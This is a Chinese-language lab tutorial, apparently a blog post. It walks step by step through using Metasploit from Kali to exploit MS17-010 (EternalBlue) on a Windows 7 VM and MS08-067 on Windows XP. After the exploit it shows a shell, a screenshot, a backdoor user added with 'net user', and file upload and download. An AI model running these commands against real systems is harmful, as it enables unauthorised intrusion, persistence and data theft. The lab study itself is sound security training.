MS17-010 MS08-067

MS17-010

永恒之蓝是ms17-010 是17年发现的

msconsole简称msf 是一款常用的安全测试工具,包含了各种常见漏洞利用模块

我们先要去关闭win7的防火墙

win7

参照:虚拟机安装win7详细步骤 - 系统之家重装系统

1.联网状态下

kali攻击机         ifconfig   192.168.109.141 

Windows7 x64      ipconfig   192.168.109.142

2.查看电脑的IP地址,kali使用ifconfig命令,Windows使用ipconfig。

3.我们ping一下,发现是可以ping通的

 4.扫描一下

两个都可以扫出来,顺便看看445端口

5.用msfconsole,每次用的时候都会出来不一样的形状,这个无所谓

 6.search ms17-010,第一个就是永恒之蓝

7.我们就是用前面的编号去代表   use 0

RHOSTS代表的是靶机,LHOST  代表攻击机

8.我们接下来就可以设置目标对象,看看有没有设置成功,看到刚刚的RHOSTS出现了靶机的IP地址,就说明我们设置成功了

9.run,看到下面的win就说明成功了

 接着证明一下,截图看看

screenshot

进入终端就直接shell

设置新的用户

net user 777 666  /add      前面的是账户名,后面的是密码,出现以下的就说明创建成功了

我们还可以上传文件

upload 文件名 位置      就可以了,同样也可以download去下载对方的文件

 

MS08-067

winxp   08年被发现的

1、执行命令:msfconsole

2、执行命令:search ms08-067

3、执行命令:use 0

4、执行命令:show options   //查看一下

5、执行命令:show targets

6、执行命令:set  target  34    //指明目标

7、执行命令:set  rhost 192.168.244.133     //设置目标对象

8、执行命令:show options    // 查看是否设置成功

9、执行命令:run     //或者是exploit也可以的

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值